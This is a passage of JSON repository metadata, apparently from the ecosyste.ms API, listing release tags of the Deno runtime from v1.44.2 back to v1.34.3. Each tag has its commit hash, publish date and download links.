d/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3",